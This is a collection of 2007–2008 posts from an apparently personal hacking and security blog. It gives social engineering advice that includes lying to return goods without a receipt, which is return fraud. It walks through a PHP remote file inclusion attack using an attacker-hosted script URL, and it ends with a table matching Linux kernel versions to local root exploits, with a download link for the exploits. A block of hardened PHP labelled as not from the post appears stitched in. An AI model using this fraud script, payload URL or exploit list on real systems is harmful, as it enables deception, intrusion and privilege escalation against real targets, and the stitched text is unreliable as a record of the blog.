Monday, April 7, 2008
Social Engineering The Act

I will be posting all my information on social engineering as I get it and write it. This thread may look crappy now but it will get a lot better.
Section one:
It's all about your act. You must practise who you are and what you will do. Whether you prefer to act like a reformed gentleman when you are acting smooth with a lady to get her to tell you something, or if you are an enraged customer, it matters. Some people use a double persona, as in they act as two different people.
Section two:
I can't stress it enough: practise, practise, practise. You need to at least practise what you will do and how you will act inside your head.
Section three:
Keywords are important, so do research. For example, at Target, if you want to return something that you got from another store, you just say it was a gift you received and the receipt wasn't put in the bag by the employee. Now this plays on two things: one, Target has a policy for returning items, and two, it was their fault.
/Chuks
Saturday, March 15, 2008
OSCP

Hi guys
I got certified for C.E.H. last year and C.P.T.P. too. This March, I'm doing Offensive Security Certified Professional. I think this is the perfect course for anybody who wants to be a pentester by profession. We are in Module 5, on ARP spoofing, and we are being shown some tactics with scripts like file2cable which prove to be very effective in a switched network.
C.E.H., according to what I found out, is more for script kiddies, where you get a tool and you just execute it.
O.S.C.P. is the course, good luck guys.
/Chuks
Tuesday, March 4, 2008
Hacker Myths
All the perceptions of hackers and their portrayal in movies and entertainment have led to the development of “hacker myths.” These myths involve common misconceptions about hackers and can lead to misconceptions about how to defend against them. Here we have attempted to identify some of these myths and dispel common misconceptions.
Myth 1: Hackers are a well-organized, malicious group.
There is indeed a community within the hacker underground. There are hacking-related groups such as Alt-2600 and Cult of the Dead Cow, IRC “hacking” channels, and related newsgroups. However, these groups are not formed into a well-organized group that targets specific networks for hacking. They share a common interest in methods for avoiding security defenses and accessing restricted information.
Myth 2: If you build it, they will come.
Myth 3: It is safe if you hide in the tall grass.
Both of these myths represent opposing views on the probability of being hacked. Myth 2 is indicative of the view that once an Internet presence is established, malicious hackers will begin to attempt a compromise. Myth 3 expresses the opinion that there are so many Web sites around that if you just do not make a lot of noise and do not have one of the truly big sites, publicity-seeking hackers will not bother to go after you.
The truth lies somewhere in the middle. You will probably be scanned by users with malicious intent, but it may not happen the moment your systems go online. Some scans will be by groups trying to get an idea of how many Web sites are using a particular piece of software. Others are unethical (but legal) system reconnaissance.
A good plan is to develop a security posture that balances the risk of system compromise with the costs of implementing and maintaining security measures. This will allow you to sleep at night. While you may not stamp out the chance of compromise entirely, you will have done what you can to prevent and limit the compromise without killing your budget.
Myth 4: Security through obscurity.
Myth 4 implies that because you are small and unknown or you hide a vulnerability, you are not at risk. For example, according to this myth, if you create a Web site but give the URL only to your friends, you don't have to worry about it being attacked. Another example we have seen is the creation of a backdoor around a firewall by putting a second network card in a DMZ system and directly connecting it to the internal network. People using such a strategy think that because they have hidden the weakness, no one will find it and the organization is safe. However, security through obscurity does not work. Someone will find the weakness or stumble upon it and the systems will be compromised.
Myth 5: All hackers are the same.
This myth is born out of a lack of knowledge among the general public about the hacker community. All hackers are not the same. As mentioned above, different hackers focus on different technologies and have different purposes and skill levels. Some hackers have malicious intent; some don't. They are not all teenagers who spend far too much time in front of a computer. Not all hackers are part of a group that defaces Web sites and creates and distributes hacking tools. The range among hackers is great, and you need to defend against them all.
/Chuks
Wednesday, January 30, 2008
BUSY WITH TRAINING

Hi guys. I haven't been posting because I have been doing some training and a lot of field work lately too.
New stuff is coming in too this coming Feb, so keep tuned.
If you wish to be in any of my trainings, you can contact me with the number posted in my profile. Training is as follows.
Assessing and Securing Wireless Networks
Few fields are as complex as wireless security. This course breaks down the issues and relevant standards that affect wireless network administrators, auditors, and information security professionals. With hands-on labs and instruction from industry wireless security experts, you will gain an intimate understanding of the risks threatening wireless networks. After identifying risks and attacks, we'll present field-proven techniques for mitigating these risks, leveraging powerful open-source and commercial tools for Linux and Windows systems.
Network Penetration Testing and Ethical Hacking
Find Security Flaws Before the Bad Guys Do
Security vulnerabilities such as weak configurations, unpatched systems, and botched architectures continue to plague organizations. Enterprises need people who can find these flaws in a professional manner to help eradicate them from our infrastructures. Lots of people claim to have penetration testing, ethical hacking, and security assessment skills, but precious few can apply these skills in a methodical regimen of professional testing to help make an organization more secure. This class covers the ingredients for successful network penetration testing to help attendees improve their enterprise's security stance.
Hacker Techniques, Exploits & Incident Handling
If your organization has an Internet connection and one or two disgruntled employees (and whose doesn't!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth.
By helping you understand attackers' tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, the in-depth information in this course helps you turn the tables on computer attackers. This course addresses the latest cutting-edge insidious attack vectors and the "oldie-but-goodie" attacks that are still so prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course includes a time-tested, step-by-step process for responding to computer incidents; a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them; and a hands-on workshop for discovering holes before the bad guys do. Additionally, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence.
Advanced Web Application Penetration Testing
Assess Your Web Apps in Depth
Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. In this class, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.
OTHERS
Others, like CEH (Certified Ethical Hacker) and CPTP (Certified Penetration Testing Professional), can be done as evening classes because they are very long and can't be finished in a week's time.
Cheers,
/Chuks
Wednesday, November 7, 2007
SOME BASIC REMOTE FILE INCLUSION
This is also called RFI; it is where the attacker tries to inject his own PHP code into your PHP app. If an attacker is able to hit this, he could execute any kind of code he wishes on the web server.
In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:
<?php
$file = $_GET['page']; // The page we wish to display, taken straight from the query string
include($file);        // Whatever the user supplied is included and executed
?>
If this vulnerability is present, the intruder can make the code fetch and run his own script by passing a URL like this:
www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?
So the vulnerable server will try to execute:
<?php
$file = "http://www.h4x3r.co.ke/evil.txt?"; // What $_GET['page'] now contains
include($file);                              // $file is the attacker's script
?>
So the intruder has this executed. As you can see, the attack script has a .txt extension, but we put a question mark behind it so that it is passed to the vulnerable website as a query string rather than as part of the path. Also, we can't use a .php extension because we don't want the script to be executed on the attack machine.
This is the basic part of how it is done; you can Google for more advanced steps to undertake these attacks, how to bypass restrictions, and other ways like back-connecting and bind shells for remote shell interaction with the server. Although this kind of attack is dying, you will still find it on a lot of servers out there due to careless programming and lack of security audits on these servers. Also, admins are to blame because they aren't aware of how hacks are done and are new to the methods intruders use to pick gates, jump in and stroll around the server.
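As an added example (not code from this post), here is the vulnerable include described above beside a hardened version that never hands user input to include(); the template directory, the allowlist and the page names are assumptions:

```php
<?php
// Added example, not the post's own code. The vulnerable include from the post
// is shown next to a hardened version. PAGES_DIR and ALLOWED_PAGES are assumed.

// --- Vulnerable form (what the post describes) ---
function render_page_vulnerable(): void
{
    $file = $_GET['page']; // untrusted: may be "http://www.h4x3r.co.ke/evil.txt?"
    include($file);        // with allow_url_include=On PHP fetches and runs the remote file
}

// --- Hardened form: user input selects from an allowlist, never becomes a path ---
const PAGES_DIR = __DIR__ . '/pages';                // assumed template directory
const ALLOWED_PAGES = ['home', 'about', 'contact'];  // assumed page names we ship

function resolve_page(string $page): ?string
{
    // Plain page names only: no slashes, dots, colons or "http://" can get through.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $page)) {
        return null;
    }
    // Only names we explicitly ship may be included.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Build the path ourselves and confirm it still lies inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.html');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(): void
{
    $raw  = $_GET['page'] ?? 'home';
    $path = is_string($raw) ? resolve_page($raw) : null; // page[]=x is not a string
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path; // fixed directory + allowlisted name: no user-controlled path or URL
}

// Defence in depth: set allow_url_include=Off in php.ini (the default since PHP 5.2)
// so include() cannot load remote URLs even if a vulnerable include remains.
```

The allowlist check is what stops the attack; the realpath check only guards against a future mistake in how the path is built.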
Peace to all,
All the best
/Chuks
Tuesday, November 6, 2007
REMOTE CODE EXECUTION


This is where the intruder uses a vulnerability in your scripts to attack a web server and execute arbitrary commands. We can have a few snapshots of how it can be done. Check here.
Note that this is a very old bug and a lot of servers are already patched against it, but you will find a number of servers and sites still vulnerable to this.
Remote Code Execution also leads to other attacks, like Local File Inclusion and Remote File Inclusion, due to a method we call Gratuitous File Uploads.
Good week,
/Chuks
Tuesday, September 25, 2007
SOME LIST OF KERNEL LOCAL EXPLOITS
This is really useful. It tells you which exploits are suited to which kernels.
2.4.17 -> newlocal, kmod
2.4.18 -> brk, brk2, newlocal, kmod, km.2
2.4.19 -> brk, brk2, newlocal, kmod, km.2
2.4.20 -> ptrace, kmod, ptrace-kmod, km.2, brk, brk2
2.4.21 -> km.2, brk, brk2, ptrace, ptrace-kmod
2.4.22 -> km.2, brk2, brk, ptrace, ptrace-kmod
2.4.22-10 -> loginx (run as ./loginx)
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.0 -> wuftpd, h00lyshit
    wuftpd: all with wuftpd 2.6.0 on REDHAT 6.2, REDHAT 6.2 (zoot), SUSE 6.3, SUSE 6.4 (all from rpm); FreeBSD 3.4-STABLE from port, FreeBSD 3.4-STABLE from packages, FreeBSD 3.4-RELEASE from port, FreeBSD 4.0-RELEASE from packages
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 to 2.6.10 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2 (run as ./krad x, with x = 1..9), h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.13-17 -> prctl, h00lyshit
-------------------
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h00lyshit, prctl
2.6.14 -> raptor, raptor2, h00lyshit, prctl
2.6.15 -> raptor, raptor2, h00lyshit, prctl
2.6.16 -> raptor, raptor2, h00lyshit, prctl
compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/